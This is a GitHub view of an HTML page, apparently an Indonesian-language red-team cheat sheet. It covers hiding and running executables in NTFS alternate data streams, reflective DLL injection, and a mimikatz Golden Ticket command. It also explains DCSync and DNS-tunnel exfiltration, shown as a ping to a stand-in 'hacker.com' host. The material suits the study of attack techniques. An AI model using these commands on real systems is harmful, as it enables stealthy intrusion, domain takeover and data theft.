Polymath-Thinks/breaker.html at main · Mannn522/Polymath-Thinks · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
<!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Protocol: BREAKER (GOD TIER)</title>
    <link rel="stylesheet" href="style.css">
    <link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@400;700&display=swap" rel="stylesheet">
</head>
<body class="breaker-theme">

    <span class="nav-trigger" onclick="openNav()">&#9776;</span>
    <div id="mySidebar" class="sidebar">
        <a href="javascript:void(0)" class="closebtn" onclick="closeNav()">&times;</a>
        <a href="index.html">00 // HOME</a>
        <a href="#stealth">04 // GHOST PROTOCOLS (STEALTH)</a>
        <a href="#ad-kill">05 // ACTIVE DIRECTORY DESTRUCTION</a>
        <a href="#exfil">06 // DATA EXFILTRATION</a>
        <a href="builder.html">>> SWITCH TO BUILDER</a>
    </div>

    <div class="container">
        <header>
            <h1>RED TEAM PROTOCOL</h1>
            <p class="tagline">OPERATIONS BEYOND DETECTION</p>
        </header>

        <h2 id="stealth" class="section-title">04 // Ghost Protocols</h2>

        <details>
            <summary>NTFS ALTERNATE DATA STREAMS (Hidden in Plain Sight)</summary>
            <div class="detail-content">
                <p>Fitur Windows yang jarang diketahui. Satu file bisa punya banyak "laci" tersembunyi.</p>
                <div class="sub-concept">
                    <h3>Cara Menyembunyikan File .EXE di dalam .TXT</h3>
                    <pre><code>type malware.exe > laporan.txt:rahasia.exe</code></pre>
                    <p>Jika Anda cek <code>laporan.txt</code>, ukurannya normal. Isinya teks biasa. Tapi ada stream tersembunyi bernama <code>rahasia.exe</code> yang menempel.</p>
                    <p><strong>Cara Execute:</strong> <code>wmic process call create C:\laporan.txt:rahasia.exe</code></p>
                    <p>Admin biasa tidak akan pernah menemukannya lewat Windows Explorer.</p>
                </div>
            </div>
        </details>

        <details>
            <summary>FILELESS MALWARE (Reflective DLL Injection)</summary>
            <div class="detail-content">
                <p>Malware jadul naruh file di Harddisk -> Terdeteksi Antivirus. Malware dewa hidup di RAM.</p>
                <p>Teknik: Load DLL langsung dari memori tanpa pernah menyentuh disk (Write to Disk = Detected). Menggunakan PowerShell untuk memanggil API Windows <code>VirtualAlloc</code> dan <code>CreateThread</code> secara manual.</p>
            </div>
        </details>

        <h2 id="ad-kill" class="section-title">05 // Active Directory Kill Chain</h2>

        <details>
            <summary>GOLDEN TICKET ATTACK (God Mode)</summary>
            <div class="detail-content">
                <p>Jika Anda berhasil mencuri hash akun <strong>krbtgt</strong> (Kerberos Ticket Granting Ticket), game over.</p>
                <p>Anda bisa membuat "Golden Ticket" palsu. Tiket ini:</p>
                <ul>
                    <li>Berlaku 10 tahun (atau selamanya).</li>
                    <li>Bisa menyamar jadi user SIAPA SAJA (termasuk Enterprise Admin).</li>
                    <li>Tetap valid walau password user asli diganti.</li>
                </ul>
                <div class="code-block">mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:S-1-5-xx /krbtgt:HASH /id:500</div>
            </div>
        </details>

        <details>
            <summary>DCSync (Pura-pura jadi Domain Controller)</summary>
            <div class="detail-content">
                <p>Memanfaatkan protokol replikasi Windows. Hacker meminta DC asli untuk "Replikasi Data" (sinkronisasi password hash) ke komputer hacker.</p>
                <p>Tidak perlu login ke server, tidak perlu tanam malware. Cukup punya hak akses replikasi, dan tarik semua password hash satu perusahaan.</p>
            </div>
        </details>

        <h2 id="exfil" class="section-title">06 // Data Exfiltration</h2>

        <details>
            <summary>DNS TUNNELING (Bypass Firewall)</summary>
            <div class="detail-content">
                <p>Firewall memblokir port 80 (HTTP), 21 (FTP), 22 (SSH). Tapi jarang memblokir port 53 (DNS) karena internet butuh DNS.</p>
                <div class="sub-concept">
                    <h3>Logika Serangan</h3>
                    <p>Anda ingin mengirim data rahasia "PASSWORD123".</p>
                    <p>1. Encode jadi Base64 -> "UEFTU1dPUkQxMjM".<br>
                    2. Lakukan DNS Query ke domain milik hacker: <code>ping UEFTU1dPUkQxMjM.hacker.com</code><br>
                    3. Server hacker menerima query tersebut, dan mencatat sub-domainnya. Data berhasil dicuri lewat protokol DNS.</p>
                    <p>Sangat lambat, tapi hampir mustahil dihentikan tanpa Deep Packet Inspection.</p>
                </div>
            </div>
        </details>
    </div>

    <script>
        function openNav() { document.getElementById("mySidebar").style.width = "320px"; }
        function closeNav() { document.getElementById("mySidebar").style.width = "0"; }
    </script>
</body>
</html>